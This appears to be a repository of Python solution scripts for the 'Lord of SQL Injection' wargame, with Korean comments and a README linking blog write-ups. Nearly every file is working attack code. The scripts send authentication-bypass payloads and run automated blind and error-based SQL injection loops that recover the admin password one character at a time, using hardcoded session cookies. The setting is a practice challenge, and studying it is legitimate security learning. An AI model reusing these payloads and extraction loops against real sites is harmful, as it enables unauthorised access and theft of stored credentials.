├── 10_Skeleton.py
├── 11_Golem.py
├── 12_Darknight.py
├── 13_Bugbear.py
├── 14_Giant.py
├── 15_Assassin.py
├── 16_Zombie_Assassin.py
├── 17_Succubus.py
├── 18_Nightmare.py
├── 19_Xavis.py
├── 1_Gremline.py
├── 21_Iron_golem.py
├── 22_Dark_eyes.py
├── 2_Cobolt.py
├── 3_Goblin.py
├── 4_Orc.py
├── 5_Wolfman.py
├── 6_DarkElf.py
├── 7_Orge.py
├── 8_Troll.py
├── 9_Vampire.py
└── README.md
/10_Skeleton.py:
--------------------------------------------------------------------------------
1 | # - *- coding : UTF-8 -*-
2 | from requests import get
3 |
4 | #URL을 설정합니다.
5 | url = "http://los.eagle-jump.org/skeleton_8d9cbfe1efbd44cfbbdc63fa605e5f1b.php"
6 | param = "?pw=%27||id=%27admin%27%23"
7 | new_url = url + param
8 |
9 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다.
10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
11 |
12 |
13 | #HTTP 요청을 보냅니다.
14 | r = get(new_url, cookies=cookies)
15 |
16 | if r.text.find("
SKELETON Clear!
") > 0:
17 | print("축하합니다! Skeleton을 클리어했습니다!")
18 |
19 |
--------------------------------------------------------------------------------
/11_Golem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding: utf-8
3 |
4 | import requests
5 | import sys # module for exit()
6 | from sys import stdout # module for fflush()
7 |
8 |
9 | print("#### Lord of SQL Injection - Golem ####\n")
10 |
11 | # URL을 설정합니다.
12 | url = "http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php"
13 |
14 | session = raw_input("Input your LOS session : ")
15 | # session = "lqaa55h0s48l8h06rc9sguktt0"
16 |
17 | # Set header to set cookie
18 | headers = {
19 | 'Cookie': 'PHPSESSID={0}'.format(session)
20 | }
21 |
22 |
23 | """ The valuble for storing admin password """
24 | password = ""
25 |
26 | query = 0
27 |
28 |
29 |
30 | """
31 | No Hack Words :
32 | - prob
33 | - _
34 | - .
35 | - ()
36 | - or
37 | - and
38 | - substr(
39 | - =
40 |
41 | """
42 |
43 |
44 | def replace(param):
45 | param = str(param)
46 |
47 | param = param.replace("or", "||")
48 | param = param.replace("and", "%26%26")
49 | param = param.replace("=", " like ")
50 | param = param.replace("substr(", "mid(")
51 | param = param.replace("#", "%23")
52 |
53 | if "prob" in param:
54 | print "Your param has 'prob'!"
55 | sys.exit()
56 |
57 | return param
58 |
59 |
60 |
61 | # get the length of password
62 | for i in range(100):
63 | param = replace("' or length(pw)={0}#".format(i))
64 | content = requests.get(url + "?pw=" + param, headers=headers).text
65 |
66 | if content.find("Hello admin
") > -1:
67 | length = i
68 | print "[*] The length of pw : {0}".format(i)
69 |
70 | break
71 |
72 |
73 |
74 | print("\n\n#### Starting Blind SQL Injection ####\n")
75 | for i in range(1, length + 1):
76 | binary = ''
77 | for j in range(0, 8):
78 | param = "?pw=' || id like 'admin' %26%26 (select mid(lpad(bin(ascii(mid(pw,{0},1))),7,0),{1},1) like 1)%23".format(i, j)
79 | content = requests.get(url + param, headers=headers).text
80 | query += 1
81 |
82 | if content.find("Hello admin") > 0:
83 | binary += '1'
84 | else:
85 | binary += '0'
86 |
87 | password += chr(int(binary, 2))
88 |
89 | print chr(int(binary, 2)), "({0})".format(binary)
90 | stdout.flush()
91 |
92 | print "\n[*] the password : ", password
93 |
94 |
95 |
96 | url = "http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php?pw={0}".format(password)
97 | r = requests.get(url, headers=headers)
98 |
99 | if r.text.find("GOLEM Clear!
") > 0:
100 | print "[*] message : Golem Clear!"
101 |
102 | print "[*] total queries : {0}".format(query)
103 |
104 |
--------------------------------------------------------------------------------
/12_Darknight.py:
--------------------------------------------------------------------------------
1 | # -*- coding : UTF-8 -*-
2 | from requests import get
3 | import string
4 |
5 | print("#### Lord of SQL Injection - Darknight ####\n")
6 |
7 | # URL을 설정합니다.
8 | url = "http://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php"
9 |
10 | #쿠키를 세팅합니다. 반드시 당신의 쿠키로 설정해야 합니다.
11 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
12 | abc = string.digits + string.ascii_letters #ASCII의 문자를 저장합니다. (브루트포스할 때 필요)
13 | result = ""
14 |
15 | #pw의 길이를 게싱합니다.
16 | for i in range(1,20):
17 | param = "?no=1 || ord(id) like 97 %26%26length(pw) like " + str(i)
18 | new_url = url + param
19 | r = get(new_url, cookies=cookies)
20 |
21 | if r.text.find("Hello admin
") > 0:
22 | idLength = i + 1
23 | print("pw의 길이는 " + str(i) + " 입니다.")
24 | break
25 |
26 |
27 | #얻은 정보를 바탕으로 블라인드 SQL Injection을 진행합니다.
28 | print("\n\n#### Starting Blind SQL Injection ####\n")
29 | for i in range(1, idLength):
30 | for a in abc:
31 | param = "?no=1 or ord(id) like 97 %26%26 ord(mid(pw," + str(i) + ",1)) <> " + str(ord(a))
32 | new_url = url + param
33 | r = get(new_url, cookies=cookies)
34 |
35 | if r.text.find("Hello admin
") == -1:
36 | print(str(i) + "번 째 pw의 값은 '" + a + "' 입니다. ")
37 | result += a
38 | break
39 |
40 | if i == 1 and result == "":
41 | print("FAIL")
42 | exit(-1)
43 |
44 | if i == idLength-1:
45 | print("\n\n#### RESULT ####")
46 | print("pw : " + result)
47 |
48 | url = "http://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?pw=" + result
49 | r = get(url, cookies=cookies)
50 |
51 | if r.text.find("DARKKNIGHT Clear!
") > 0:
52 | print("축하합니다! Darknight를 클리어했습니다.")
53 |
54 |
--------------------------------------------------------------------------------
/13_Bugbear.py:
--------------------------------------------------------------------------------
1 | # -*- coding : UTF-8 -*-
2 | from requests import get
3 | import string
4 |
5 | print("#### Lord of SQL Injection - Bugbear ####\n")
6 |
7 | # URL을 설정합니다.
8 | url = "http://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php"
9 |
10 | #쿠키를 세팅합니다. 반드시 당신의 쿠키로 설정해야 합니다.
11 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
12 | abc = string.digits + string.ascii_letters #ASCII의 문자를 저장합니다. (브루트포스할 때 필요)
13 | result = ""
14 |
15 | #pw의 길이를 게싱합니다.
16 | for i in range(1,20):
17 | param = "?no=1||hex(mid(id,1,1))in(61)%26%26length(pw)<>" + str(i)
18 | new_url = url + param
19 | r = get(new_url, cookies=cookies)
20 |
21 | if r.text.find("Hello admin
") == -1:
22 | idLength = i + 1
23 | print("pw의 길이는 " + str(i) + " 입니다.")
24 | break
25 |
26 |
27 | #얻은 정보를 바탕으로 블라인드 SQL Injection을 진행합니다.
28 | print("\n\n#### Starting Blind SQL Injection ####\n")
29 | for i in range(1, idLength):
30 | for a in abc:
31 | ab = str(hex(ord(a))).replace("0x", "")
32 | param = "?no=1||hex(mid(id,1,1))in(61)%26%26hex(mid(pw," + str(i) + ",1))<>" + ab
33 | new_url = url + param
34 | r = get(new_url, cookies=cookies)
35 |
36 | if r.text.find("Hello admin
") == -1:
37 | print(str(i) + "번 째 pw의 값은 '" + a + "' 입니다. ")
38 | result += a
39 | break
40 |
41 | if i == 1 and result == "":
42 | print("FAIL")
43 | exit(-1)
44 |
45 | if i == idLength-1:
46 | print("\n\n#### RESULT ####")
47 | print("pw : " + result)
48 |
49 | url = "http://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?pw=" + result
50 | r = get(url, cookies=cookies)
51 |
52 | if r.text.find("BUGBEAR Clear!
") > 0:
53 | print("축하합니다! Bugbear를 클리어했습니다.")
54 |
55 |
--------------------------------------------------------------------------------
/14_Giant.py:
--------------------------------------------------------------------------------
1 | # - *- coding : UTF-8 -*-
2 | from requests import get
3 | import random
4 |
5 | #URL을 설정합니다.
6 | url = "http://los.eagle-jump.org/giant_9e5c61fc7f0711c680a4bf2553ee60bb.php"
7 |
8 | #유효한 개행 문자들을 저장합니다.
9 | new_tab = ["%0b", "%0c"]
10 |
11 | #위의 개행 문자 둘 중 하나를 선택합니다.
12 | rand_int = random.randint(0,1)
13 | param = "?shit=" + new_tab[rand_int]
14 | new_url = url + param
15 |
16 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다.
17 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
18 |
19 |
20 | #HTTP 요청을 보냅니다.
21 | r = get(new_url, cookies=cookies)
22 |
23 | if r.text.find("GIANT Clear!
") > 0:
24 | print("축하합니다! Giant을 클리어했습니다!")
25 |
26 |
--------------------------------------------------------------------------------
/15_Assassin.py:
--------------------------------------------------------------------------------
1 | # -*- coding : UTF-8 -*-
2 | from requests import get
3 | import string
4 |
5 | print("#### Lord of SQL Injection - Assassin ####\n")
6 |
7 | # URL을 설정합니다.
8 | url = "http://los.eagle-jump.org/assassin_bec1c90a48bc3a9f95fbf0c8ae8c88e1.php"
9 |
10 | #쿠키를 세팅합니다. 반드시 당신의 쿠키로 설정해야 합니다.
11 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
12 |
13 | #ASCII의 문자를 저장합니다. (브루트포스할 때 필요)
14 | abc = string.digits + string.ascii_letters
15 |
16 | result = ""
17 |
18 | #얻은 정보를 바탕으로 블라인드 SQL Injection을 진행합니다.
19 | print("\n\n#### Starting Blind SQL Injection ####\n")
20 | identify = 0
21 | for i in range(1,20):
22 | for a in abc:
23 | param = "?pw=" + result + a + "%"
24 | new_url = url + param
25 | r = get(new_url, cookies=cookies)
26 |
27 | if r.text.find("Hello guest
") > 0:
28 | identify = 1
29 | print(str(i) + "번 째 pw의 값은 '" + a + "' 입니다. ")
30 | result += a
31 | if r.text.find("ASSASSIN Clear!
") > 0:
32 | print("축하합니다! Orge를 클리어했습니다.")
33 |
34 |
35 | if len(result) < (i-1):
36 | break
37 |
38 | print("\n\n#### RESULT ####")
39 | print("pw : " + result)
40 |
--------------------------------------------------------------------------------
/16_Zombie_Assassin.py:
--------------------------------------------------------------------------------
1 | # - *- coding : UTF-8 -*-
2 | from requests import get
3 |
4 | #URL을 설정합니다.
5 | url = "http://los.eagle-jump.org/zombie_assassin_14dfa83153eb348c4aea012d453e9c8a.php"
6 | param = "?pw=%00%27or%271%27=%271"
7 | new_url = url + param
8 |
9 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다.
10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
11 |
12 |
13 | #HTTP 요청을 보냅니다.
14 | r = get(new_url, cookies=cookies)
15 |
16 | if r.text.find("ZOMBIE_ASSASSIN Clear!
") > 0:
17 | print("축하합니다! Zombie assassin을 클리어했습니다!")
18 |
19 |
--------------------------------------------------------------------------------
/17_Succubus.py:
--------------------------------------------------------------------------------
1 | # - *- coding : UTF-8 -*-
2 | from requests import get
3 |
4 | #URL을 설정합니다.
5 | url = "http://los.eagle-jump.org/succubus_8ab2d195be2e0b10a3b5aa2873d0863f.php"
6 | param = "?id=asdf\&pw=or%201=1%23"
7 | new_url = url + param
8 |
9 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다.
10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
11 |
12 |
13 | #HTTP 요청을 보냅니다.
14 | r = get(new_url, cookies=cookies)
15 |
16 | if r.text.find("SUCCUBUS Clear!
") > 0:
17 | print("축하합니다! Succubus를 클리어했습니다!")
18 |
19 |
--------------------------------------------------------------------------------
/18_Nightmare.py:
--------------------------------------------------------------------------------
1 | # - *- coding : UTF-8 -*-
2 | from requests import get
3 |
4 | #URL을 설정합니다.
5 | url = "http://los.eagle-jump.org/nightmare_ce407ee88ba848c2bec8e42aaeaa6ad4.php"
6 | param = "?pw=%27)<1;%00"
7 | new_url = url + param
8 |
9 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다.
10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
11 |
12 |
13 | #HTTP 요청을 보냅니다.
14 | r = get(new_url, cookies=cookies)
15 |
16 | if r.text.find("NIGHTMARE Clear!
") > 0:
17 | print("축하합니다! Nightmare를 클리어했습니다!")
18 |
19 |
--------------------------------------------------------------------------------
/19_Xavis.py:
--------------------------------------------------------------------------------
1 | # -*- coding : UTF-8 -*-
2 | # pw의 모든 값의 아스키값이 160이 넘기 때문에 효율성 문제로 160부터 시작했습니다.
3 | import requests
4 |
5 | # Set cookies
6 | cookies = dict(PHPSESSID='gsen5qt14q70cvj5doeee5lvp1')
7 |
8 | result = ""
9 | hexacode = '0x'
10 | for i in range(1,11):
11 | print("-" * 25)
12 | print("[=] Testing %d character" % i)
13 | print('-' * 25)
14 | for ascii in range(160, 1000):
15 | if i == 2 or i == 6:
16 | ascii += 40
17 | url = 'http://los.eagle-jump.org/xavis_fd4389515d6540477114ec3c79623afe.php'
18 | url += "?pw=1'||ord(id)=97%26%26ord(mid(pw,{0},1))={1}%23".format(i, ascii)
19 | #print "[=] Testing url : " + url
20 |
21 | r = requests.get(url, cookies=cookies)
22 |
23 | if r.text.find("Hello admin") > -1:
24 | char = chr(ascii)
25 | hexacode += str(hex(ascii)).replace('0x', '')
26 | print("\n[*] %d character is %s (ascii code : %d)\n\n" % (i, char, ascii))
27 | result += char
28 | break
29 |
30 | print("\n\n\n[*] admin's password : %s(hexacode : %s)" % (result, hexacode))
31 |
32 |
33 |
--------------------------------------------------------------------------------
/1_Gremline.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding: utf-8
3 |
4 | from requests import get
5 |
6 |
7 | url = "http://los.eagle-jump.org/gremlin_bbc5af7bed14aa50b84986f2de742f31.php"
8 |
9 | # Set PHPSESSID by user input
10 | session = input("Input your LOS session : ")
11 | # session = "gequo9hff2f19sjmieftjnuf50"
12 |
13 | headers = {
14 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
15 | 'Accept-Encoding': 'gzip, deflate, br',
16 | 'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
17 | 'Cookie': 'PHPSESSID={0}'.format(session)
18 | }
19 |
20 | param = "?id='or'1'='1'%23"
21 |
22 | r = get(url + param , headers=headers)
23 |
24 | if r.text.find("GREMLIN Clear!
") > 0:
25 | print("Gremlin Clear!")
26 |
--------------------------------------------------------------------------------
/21_Iron_golem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding: utf-8
3 | import requests
4 |
5 | # Set cookies
6 | cookies = dict(PHPSESSID="gequo9hff2f19sjmieftjnuf50")
7 |
8 |
9 |
10 | # pw Length guessing
11 | print("Starting pw guessing")
12 | for i in range(1, 100):
13 | url = "http://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php"
14 | payload = "?pw=1'||if(length(pw)="+str(i)+",1,(select%201%20union%20select%202))%23"
15 | url += payload
16 |
17 | r = requests.get(url, cookies=cookies)
18 | if r.text.find("Subquery returns more than 1 row") > -1:
19 | print("[*] pw의 길이는 %2d가 아닙니다. " % i)
20 | else :
21 | print("[*] pw의 길이는 %2d입니다!" % i)
22 | length = i
23 | break
24 |
25 |
26 | # start pwning
27 | print("\n\n\n")
28 | print("[+] Configuring pw")
29 | for i in range(1, length+1):
30 | pwn = 31
31 | url = "http://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php"
32 | payload = "?pw=1%27||if(ord(mid(pw,"+str(i)+",1))>"+str(pwn)+",1,(select%201%20union%20select%202))%23"
33 | url += payload
34 |
35 | r = requests.get(url, cookies=cookies)
36 | if r.text.find("Subquery returns more than 1 row") > -1:
37 | print("[*] pw의 %2d번째에 값이 없습니다." % (i))
38 | else :
39 | print("[*] pw의 %2d번째에 값이 있습니다!" % (i))
40 |
41 |
42 | print("\n\n\n")
43 | result = ""
44 | print("[+] Starting to pwn")
45 | for i in range(1,5):
46 | for j in range(pwn, 100):
47 | url = "http://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php"
48 | payload = "?pw=1%27||if(ord(mid(pw,"+str(i)+",1))="+str(j)+",1,(select%201%20union%20select%202))%23"
49 | url += payload
50 |
51 | r = requests.get(url, cookies=cookies)
52 | if r.text.find("Subquery returns more than 1 row") > -1:
53 | print("[*] pw의 %d번째 값은 %d가 아닙니다. " % (i, j))
54 | else :
55 | print("[*] pw의 %d번째 값은 %d입니다! " % (i, j))
56 | result += chr(j)
57 | break
58 |
59 | print("\n\n\n[+] result : " + result + "\n")
60 |
--------------------------------------------------------------------------------
/22_Dark_eyes.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding : UTF-8 -*-
3 |
4 | import requests
5 | import string
6 |
7 | # url encoding
8 | def urlQuery(url):
9 | url = url.replace("#", "%23")
10 | url = url.replace(" ", "%20")
11 | url = url.replace("'", "%27")
12 | url = url.replace("&", "%26%26")
13 | url = url.replace(">", "%3E")
14 | url = url.replace("<", "%3C")
15 |
16 | return url
17 |
18 | cookies = dict(PHPSESSID="8nprcactb6uekd9ocb96q3fh17")
19 | url = "http://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php"
20 |
21 |
22 | abc = string.ascii_letters + string.digits + "!@#$%^&*()_-{}[];:><,./?"
23 |
24 | # select * from test where id='admin' and pw='' or ord(id)=97 and (length(pw)=0 or (select 1 union select pw))
25 |
26 |
27 |
28 | # pw length config
29 | print("[+] pw length config \n")
30 | for i in range(0, 100):
31 | payload = "?pw=' OR ord(id)=97 and (length(pw)=" + str(i) + " or (select 1 union select pw))#"
32 | payload = urlQuery(payload)
33 | r = requests.get(url+payload, cookies=cookies)
34 |
35 | if len(r.text) < 5:
36 | print("[-] Err0r was f0und. - the length of the 'pw' is not " + str(i))
37 | else :
38 | print("[*] the length of 'pw' is " + str(i))
39 | length = i
40 | break
41 |
42 | result = ""
43 | print("\n\n=====================\n\nblind sqli start\n")
44 | for i in range(1, (length+1)):
45 | for a in abc:
46 | payload = "?pw=' OR ord(id)=97 AND (ord(mid(pw,"+str(i)+",1))="+str(ord(a))+\
47 | " or (select 1 union select pw))%23"
48 |
49 | r = requests.get(url+payload, cookies=cookies)
50 |
51 | if len(r.text) < 5:
52 | print("[-] Err0r was f0und. (%d, %c)" %(i, a))
53 | else:
54 | print("[*] the %d pw is %c" % (i, a))
55 | result += a
56 | break
57 |
58 | print("[=] the result : " + result)
59 |
--------------------------------------------------------------------------------
/2_Cobolt.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding: utf-8
3 | import requests
4 |
5 | url = "http://los.eagle-jump.org/cobolt_ee003e254d2fe4fa6cc9505f89e44620.php"
6 | param = "?id=admin'%23"
7 |
8 | cookie = input("Input your session : ")
9 | # cookie = "5u71g5vp7547tv8ffl7osl0fl5"
10 |
11 | headers = {
12 | 'Cookie': cookie
13 | }
14 |
15 | r = requests.get(url + param, headers=headers)
16 |
17 | if r.text.find("COBOLT Clear!
") > 0:
18 | print("Cobolt Clear!")
19 |
--------------------------------------------------------------------------------
/3_Goblin.py:
--------------------------------------------------------------------------------
1 | # -*- coding : UTF-8 -*-
2 | from requests import get
3 |
4 | url = "http://los.eagle-jump.org/goblin_5559aacf2617d21ebb6efe907b7dded8.php"
5 | #MySQL의 substr() 함수를 이용하여 문제를 풉니다.
6 | param = "?no=0%20or%20ascii(substr(id,1,1))=97"
7 |
8 | new_url = url + param
9 |
10 | #쿠리를 설정합니다. 반드시 당신의 쿠키로 설정해주세요.
11 | cookie = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
12 |
13 |
14 | r = get(new_url, cookies=cookie)
15 | if r.text.find("GOBLIN Clear!
") > 0:
16 | print("축하합니다! Goblin을 클리어했습니다!")
17 |
--------------------------------------------------------------------------------
/4_Orc.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding: UTF-8 -*-
3 | import requests
4 | from sys import stdout
5 |
6 | query = 0
7 | print("#### Lord of SQL Injection - Orc ####\n")
8 |
9 | url = "http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php"
10 |
11 |
12 | # session = "gequo9hff2f19sjmieftjnuf50"
13 | session = raw_input("Input your LOS session : ")
14 |
15 | headers = {
16 | 'Cookie': 'PHPSESSID={0}'.format(session)
17 | }
18 |
19 | password = ""
20 |
21 | # get the length of password
22 | for i in range(100):
23 | param = "?pw=' or id='admin' and length(pw)={0}%23".format(i)
24 |
25 | content = requests.get(url + param, headers=headers).text
26 | query += 1
27 |
28 | if content.find("Hello admin") > -1:
29 | length = i
30 | print "[*] The length of admin password : {0}".format(i)
31 | break
32 |
33 |
34 | print("\n\n#### Starting Blind SQL Injection ####\n")
35 | # substr(lpad(bin(ascii(substr('asdf',1,1))),7,0),1,1)
36 |
37 | print "[*] the password : ",
38 | stdout.flush()
39 |
40 | for i in range(1, length+1):
41 |
42 | binary = ''
43 | for j in range(0, 8):
44 | param = "?pw=' or id='admin' and (select substr(lpad(bin(ascii(substr(pw,{0},1))),7,0),{1},1)=1)%23".format(i, j)
45 | content = requests.get(url + param, headers=headers).text
46 | query += 1
47 |
48 | if content.find("Hello admin") > 0:
49 | binary += '1'
50 | else:
51 | binary += '0'
52 |
53 | password += chr(int(binary, 2))
54 |
55 | print chr(int(binary, 2)),
56 | stdout.flush()
57 |
58 | print "\n[*] the password : ", password
59 |
60 |
61 | url = "http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?pw={0}".format(password)
62 | content = requests.get(url + param, headers=headers).content
63 |
64 | if content.find("ORC Clear!
") > 0:
65 | print "ORC Clear!"
66 |
67 | print "[+] total query : {0}".format(query)
--------------------------------------------------------------------------------
/5_Wolfman.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding: utf-8
3 |
4 | import requests
5 | import urllib
6 |
7 |
8 | def urlencode(query):
9 | replacement = {
10 | '#': '%23',
11 | '&': '%26',
12 | ' ': '%20',
13 | '=': '%3D',
14 | '+': '%2B',
15 | '\'': '%27',
16 | '%': '%25'
17 | }
18 |
19 | for r in replacement:
20 | query.replace(r, replacement[r])
21 |
22 | return query
23 |
24 | #URL을 설정합니다.
25 | url = "http://los.eagle-jump.org/wolfman_f14e72f8d97e3cb7b8fe02bef1590757.php"
26 | param = urlencode("?pw='||id='admin'%23")
27 |
28 |
29 | session = input("Input your LOS session : ")
30 | headers = {
31 | 'Cookie': 'PHPSESSID={0}'.format(session)
32 | }
33 |
34 |
35 | r = requests.get(url + param, headers=headers)
36 |
37 | if r.text.find("WOLFMAN Clear!
") > 0:
38 | print "Wolfman Clear!"
39 |
40 |
--------------------------------------------------------------------------------
/6_DarkElf.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding: utf-8
3 |
4 | import requests
5 |
6 | url = "http://los.eagle-jump.org/darkelf_6e50323a0bfccc2f3daf4df731651f75.php"
7 | param = "?pw=%27||id=%27admin"
8 |
9 | session = raw_input("Input your LOS session : ")
10 | # session = "gequo9hff2f19sjmieftjnuf50"
11 |
12 | headers = {
13 | 'Cookie': 'PHPSESSID={0}'.format(session)
14 | }
15 |
16 |
17 | r = requests.get(url + param, headers=headers)
18 |
19 | if r.text.find("DARKELF Clear!
") > 0:
20 | print("DarkElf Clear!")
21 |
22 |
--------------------------------------------------------------------------------
/7_Orge.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding: utf-8
3 |
4 | import requests
5 | from sys import stdout
6 |
7 | print("#### Lord of SQL Injection - Orge ####\n")
8 |
9 | url = "http://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php"
10 |
11 | session = raw_input("Input your LOS session : ")
12 | # session = "lqaa55h0s48l8h06rc9sguktt0"
13 |
14 | headers = {
15 | 'Cookie': 'PHPSESSID={0}'.format(session)
16 | }
17 |
18 | password = ""
19 | query = 0
20 |
21 |
22 | # guess the length of password
23 | for i in range(100):
24 | param = "?pw=' || id='admin' %26%26 length(pw)={0}%23".format(i)
25 | r = requests.get(url + param, headers=headers)
26 | query += 1
27 |
28 | if r.text.find("Hello admin
") > 0:
29 | length = i
30 | print "[*] The length of 'pw' is {0}".format(i)
31 | break
32 |
33 |
34 |
35 |
36 | print("\n\n#### Starting Blind SQL Injection ####\n")
37 | for i in range(1, length + 1):
38 | binary = ''
39 | for j in range(0, 8):
40 | param = "?pw=' || id='admin' %26%26 (select substr(lpad(bin(ascii(substr(pw,{0},1))),7,0),{1},1)=1)%23".format(i, j)
41 | content = requests.get(url + param, headers=headers).text
42 | query += 1
43 |
44 | if content.find("Hello admin") > 0:
45 | binary += '1'
46 | else:
47 | binary += '0'
48 |
49 | password += chr(int(binary, 2))
50 |
51 | print chr(int(binary, 2)), "({0})".format(binary)
52 | stdout.flush()
53 |
54 | print "\n[*] the password : ", password
55 |
56 |
57 | url = "http://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php?pw=" + password
58 | r = requests.get(url, headers=headers)
59 |
60 | if r.text.find("ORGE Clear!
") > 0:
61 | print "[*] message : Orge Clear!"
62 |
63 | print "[*] total queries : {0}".format(query)
--------------------------------------------------------------------------------
/8_Troll.py:
--------------------------------------------------------------------------------
1 | # - *- coding : UTF-8 -*-
2 | from requests import get
3 |
4 | #URL을 설정합니다.
5 | url = "http://los.eagle-jump.org/troll_6d1f080fa30a07dbaf7342285ba0e158.php"
6 | param = "?id=admIn"
7 | new_url = url + param
8 |
9 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다.
10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
11 |
12 |
13 | #HTTP 요청을 보냅니다.
14 | r = get(new_url, cookies=cookies)
15 |
16 | if r.text.find("TROLL Clear!
") > 0:
17 | print("축하합니다! Troll을 클리어했습니다!")
18 |
19 |
--------------------------------------------------------------------------------
/9_Vampire.py:
--------------------------------------------------------------------------------
1 | # - *- coding : UTF-8 -*-
2 | from requests import get
3 |
4 | #URL을 설정합니다.
5 | url = "http://los.eagle-jump.org/vampire_0538b0259b6680c1ca4631a388177ed4.php"
6 | param = "?id=admadminin"
7 | new_url = url + param
8 |
9 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다.
10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
11 |
12 |
13 | #HTTP 요청을 보냅니다.
14 | r = get(new_url, cookies=cookies)
15 |
16 | if r.text.find("VAMPIRE Clear!
") > 0:
17 | print("축하합니다! Vampire을 클리어했습니다!")
18 |
19 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Lord-of-SQL-Injection
2 | Lord of SQL Injection (주석은 한글로 작성되어 있습니다. / Comments were written in Korean!)
3 |
4 | 1. Gremlin : http://chaneyoon.tistory.com/51
5 | 2. Cobolt : http://chaneyoon.tistory.com/52
6 | 3. Goblin : http://chaneyoon.tistory.com/53
7 | 4. Orc : http://chaneyoon.tistory.com/54
8 | 5. Wolfman : http://chaneyoon.tistory.com/55
9 | 6. Darkelf : http://chaneyoon.tistory.com/56
10 | 7. Orge : http://chaneyoon.tistory.com/57
11 | 8. Troll : http://chaneyoon.tistory.com/58
12 | 9. Vampire : http://chaneyoon.tistory.com/59
13 | 10. Skeleton : http://chaneyoon.tistory.com/60
14 | 11. Golem : http://chaneyoon.tistory.com/61
15 | 12. Darknight : http://chaneyoon.tistory.com/62
16 | 13. Bugbear : http://chaneyoon.tistory.com/63
17 | 14. Giant : http://chaneyoon.tistory.com/64
18 | 15. Assassin : http://chaneyoon.tistory.com/65
19 | 16. Assassin_Zombie : http://chaneyoon.tistory.com/66
20 | 21. Iron_golem : http://chaneyoon.tistory.com/107
21 |
22 |
23 |
--------------------------------------------------------------------------------